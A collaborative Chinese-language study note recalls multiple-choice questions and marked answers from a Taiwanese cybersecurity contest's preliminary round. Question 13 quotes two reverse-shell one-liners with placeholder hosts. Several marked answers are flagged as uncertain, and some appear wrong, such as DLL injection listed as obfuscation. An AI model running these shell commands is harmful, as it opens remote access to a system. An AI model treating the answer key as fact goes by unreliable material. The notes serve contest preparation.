# 113學年度 金盾獎初賽【大專校院組】 >應該有一些人想準備但官方沒有釋出考古題 >所以多少幫忙紀錄給有心想準備的同學們OwO 歡迎幫忙共筆補充>< 覺得排版分類不好歡迎直接修正owo - 競賽時間：$2$ 小時。 - 競賽模式：初賽模式採選擇題作答，~~共 80 題~~ 共 $50$ 題，皆為**單選題**，每題分數依難易度給分，答錯不扣分。 - 試題範圍：包含逆向工程(Reverse)、網站相關(Web)、具漏洞的服務(Pwn)、加解密演算法(Crypto)、其他綜合(Misc)、鑑識(Forensic)。 [toc] ## 原始題目（簡略版） 為什麼要在意易揮發 無檔案攻擊 斷電 1. 給一份 code 問哪邊有用 MACRO - 選有 M 的？ 第 13 行 2. 哪些是 DDOS 攻擊? - (O) TCP RST Flood, Tear Drop, TCP Fragment Attack - (X) Directory Traversal Attack, DNS Poisoning 3. 何者可以取得應用程式啟動紀錄 - **prefetch** - 瀏覽歷程 4. 哪個技術可以實現多個 IP 對到同一個 domain? - **Fast flux DNS** - DNS ZONE Transfer - DNS intergration - Dynamic DNS 5. Volatility 中，如何發現使用雙向鏈表（double linked-list）技術隱藏的惡意程序或檔案。 - pslist - **psscan** - psdump - pstree 6. Shor’s Algorithm 是一種量子演算法，能有效破解基於大數質因數分解的 RSA 加密。該演算法之所以能在指數時間內完成分解，依賴的是量子的哪種特性？ - **量子疊加** - 量子穿隧 - 量子相干 - 量子不確定性 7. 哪一個演算法容易遭受中間人攻擊？ - RSA - DES - MAC - HMAC 8. 在 Windows 系統中，不允許密碼暴力破解的情況，攻擊者仍可以使用哪種攻擊方式登入其他User？ Administrator:500:(HASH):(HASH) - **Pass the Hash** - Pass the Key - Pass the ticket - Pass the token 9. [File signature](https://en.wikipedia.org/wiki/List_of_file_signatures) start with 4D 5A .. - **dll** - jpeg - docx - ps1 10. 可以提取 Cobalt Strike 配置檔案的工具 - **1768.py** - Cheat Engine - hollows hunter 11. 內外網無法連線 隱藏內網 IP - Web application Firewall - Intrusion Prevention System - proxy server >[name=隨風]這個嗎？ - Radius 伺服器 12. Nmap 功能 - (O) 作業系統偵測、 - (X) 監測網路封包流量 13. 哪個沒有開 reverse shell？ - `nc <IP> -e sh` - `sh -i >& /dev/tcp/<IP>/<port> 0>&1` 14. Kerberos - **ticket** - token - secret - credential 15. ..啟動日誌.. - **System.evtx** - Application.envt - Security.envt 16. svchost.exe 下列哪個行為可能是駭客偽裝的 - **啟動路徑在 C:\system\..** - svchost 的父程序是 service.exe - 啟動時間比開機時間晚一分鐘 18. 修改哪一個 regidit 是開機自啟動???? ***題目選項皆不確定**<!--有確定的可以幫我拿掉 桿蟹><--> - **\SOFTWARE\Microsoft\Windows\CurrentVersion\Run** - \SOFTWARE\Microsoft\Windows\CurrentVersion\ - \SOFTWARE\Microsoft\Windows\CurrentVersion\Startup - \SOFTWARE\Microsoft\Windows\CurrentVersion\Auto 19. 哪一個 regedit 不是開機自啟動@@?? ***題目選項皆不確定**<!--有確定的可以幫我拿掉 桿蟹><--> - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit - \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - \SOFTWARE\Microsoft\Windows\CurrentVersion\Run - XXX\polices\Explorer >[name=隨風]這個嗎？ 20. MAC IP - **ARP spoofing** - IP spoofing 21. 哪個手法是 MITRE ATT&CK 的 Obfuscated Files or Information 技術 - sofeware packing - binary padding - **dll injection** >[name=隨風]這個嗎？ - steganography 22. ???? 何者屬於程式流劫持技術 - SEH Overwrite - **heap spraying** - Memory swap 23. 2018 OWASP IoT Top 10 - **弱密碼** - Injection 24. 給一段函式的組合語言，問開頭 register 行為變化 - **Stack 88 bytes, EBP ESP** - 88 bits EBP EIP - 88 bytes RBP EIP - 88 bits EBP ESP 25. 給你一段 code ，問回傳的變數(DWORD)是幾 bytes ? - 1 byte - 2 bytes - 4 bytes - 8 bytes 26. 何者非駭客入侵前會調查的內容? - 公司IP範圍 - 公司域名 - **公司股票趨勢** 27. Linux 存密碼會用甚麼方式 - **Hash** - Asymmetric Encryption - Symmetric Encryption - Encoding 28. 有一個惡意軟體想要躲避沙箱偵測的話，何種方法較不適合 - 先呼叫sleep()一陣子 - 檢查是否為一般使用者的鍵盤滑鼠操作行為 - 等待關機後的下次開機再執行 - **ping 8.8.8.8** 29. 軟體公司供應鏈攻擊 - **參與開源程式開發過程..** - 軟體漏洞 - 殭屍網路 30. 入侵指標 - BOT(Robot) - IOT(Internet Of Things) - APT(Advanced Persistent Threat) - **IoC(Indicators of Compromise)** 31. CreateMutexA - 提權 - **避免程序重複開啟** 32. 題組題，內文提及某物聯網設備... - 韌體更新 - 更換密碼 - 防火牆阻擋 - 不啟用沒在用的服務 33. 減緩目錄遍歷攻擊 - **.** - <> - ； - ' 34. 以下何者不是駭客駭入windows後會使用原本內建在電腦中的工具? - at.exe - **nc.exe** - bitsadmin.exe - certutil.exe 35. 駭客最喜歡哪一種虛擬貨幣比較追查不到金流? - 波場幣(TRX) - 比特幣 - 乙太幣(ETH) - 門羅幣(XMR) >[name=隨風]這個嗎？ 37. 一個被 botnet 感染的XXX，攻擊者可以做到什麼？ - DDOS - 勒索 38. DLL side loading 哪一個目錄最優先被系統執行？ - system - system32 - **當前目錄** 39. 去中心化星際檔案系統(IPFS)，哪些選項是錯誤的？ - 可以透過XXX阻塞 - 釣魚 (X) 駭客可以隨意修改上傳IPFS的檔案 40. 哪一個網卡模式最能夠隔離 VM 和主機? - NAT - bridge - **host-only** - 自訂模式 ## tags ### 密碼學與安全協議 - 量子安全密碼學（後量子密碼學） - 中間人攻擊、RSA、DES、MAC、HMAC - Kerberos - 隱寫術 Steganography - 虛擬貨幣 - 去中心化 --- ### DNS - Fast-flux DNS - DNS Zone Transfer - Dynamic DNS ### 攻擊 - DDoS 攻擊 - TCP RST Flood - Tear Drop - TCP Fragment Attack - DNS Poisoning - ARP Spoofing - OWASP Top 10 - Ransomeware 勒索病毒 - Botnet 殭屍網路 - DLL injection --- ### **惡意軟體分析與利用技術** - 軟體加殼 Software packing - 二進位填充 Binary padding - DLL Injection - Heap spraying - nc reverse shell --- ### Windows - Prefetch - Explorer 進程 - 系統事件日誌 System.evtx - Svchost.exe - At.exe - Windows 註冊表自啟動項 - `\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` - `\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce` --- ### 安全工具與命令 - Volatility 插件 - pslist - psscan - psdump - pstree - Nmap 功能 - 入侵防禦系統 Intrusion Prevention System（IPS） - At.exe - Netcat（nc） --- ### 無分類 - File signature - 水坑攻擊 --- <!--### tags sofeware packing binary padding 量子安全密碼學（後量子密碼學） stegangraphy prefetch DDOS TCP RST Flood,tear drop, tcp fragment attack, DNS poisoning Fast-flux DNS DNS zone trasfer Dynamic DNS Volatility pslist psscan psdump pstree man-in-the-middle RSA DES MAC HMAC File signature DLL injection Intrusion prevention system(IPS) arp spoofing explorer nmap 功能 nc reverse shell kerberos System.evtx svchost.exe at.exe \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce \SOFTWARE\Microsoft\Windows\CurrentVersion\Run heap spraying memory swap